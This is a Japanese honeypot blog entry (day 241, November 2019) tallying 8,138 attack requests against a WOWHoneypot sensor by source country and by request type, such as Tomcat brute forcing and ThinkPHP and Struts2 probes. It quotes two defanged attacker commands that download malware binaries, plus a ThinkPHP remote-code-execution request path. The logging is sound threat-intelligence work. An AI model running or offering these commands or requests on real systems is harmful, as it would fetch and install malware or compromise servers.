23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(241日目)

2019/11/12(火)

トータルは8138件でした。

ハンティングログは以下です。

121.52.151[.]102 certutil.exe -urlcache -split -f hxxp[:]//fid[.]hognoob[.]se/download[.]exe

www.virustotal.com
www.virustotal.com

76.174.65[.]128 wget+hxxp[:]//185.172.110[.]220/mipsel

www.virustotal.com
www.virustotal.com

IPのロケーション別の件数は以下です。

アメリ 4024
ウルグアイ 4002
中国 43
ブラジル 11
ドイツ 11
オランダ 10
フランス 6
イラン 4
パキスタン 3
タイ 3
インド 3
香港 3
インドネシア 2
エストニア 2
トルコ 2
ルーマニア 1
アイスランド 1
ブルガリア 1
チェコ 1
ベネズエラ 1
スリナム 1
アルゼンチン 1
バングラデシュ 1
ナイジェリア 1
南アフリカ 1

f:id:sec23:20191124183733p:plain

件数 概要 リクエス
8005 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
65 アクセス GET /
7 WordPress の Pingback を狙ったブルートフォース攻撃 POST /xmlrpc.php
7 WordPressのログインページに対するブルートフォース攻撃 POST /wp-login.php
7 WordPressのログインページに対するブルートフォース攻撃 GET /wp-login.php
6 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
6 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
5 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
3 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
2 クローリング HEAD /robots.txt
1 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 POST /editBlackAndWhiteList
1 不正中継の調査 HEAD hxxp[:]//123.125.114.144/
1 不正中継の調査 HEAD hxxp[:]//112.124.42.80:63435/
1 不正中継の調査 GET hxxp[:]//www.123cha.com/
1 調査 HEAD /
1 Apache Struts2脆弱性(CVE-2017-5638)を狙った通信 GET /struts2-rest-showcase/orders.xhtml
1 Apache Struts2脆弱性(CVE-2017-5638)を狙った通信 GET /index.do
1 Apache Struts2脆弱性(CVE-2017-5638)を狙った通信 GET /index.action
1 Yealinkの調査? GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status
1 調査 GET /script
1 phpMyAdminのスキャン GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 phpMyAdminのスキャン GET /pma/scripts/setup.php
1 phpMyAdminのスキャン GET /phpmyadmin/scripts/setup.php
1 phpMyAdminのスキャン GET /phpMyAdmin/scripts/setup.php
1 phpMyAdminのスキャン GET /myadmin/scripts/setup.php
1 phpMyAdminのスキャン GET /MyAdmin/scripts/setup.php
1 GET /muieblackcat
1 不明 GET /manager/top.asp
1 不明 GET /js/preload/example.txt
1 ルーターを狙った通信 GET /cgi-bin
1 不明 GET /applications/mailtng/configs/databases.ini
1 不正中継の試み CONNECT www.ip.cn:443
1 不正中継の試み CONNECT www.baidu.com:443
1 不正中継の試み CONNECT cn.bing.com:443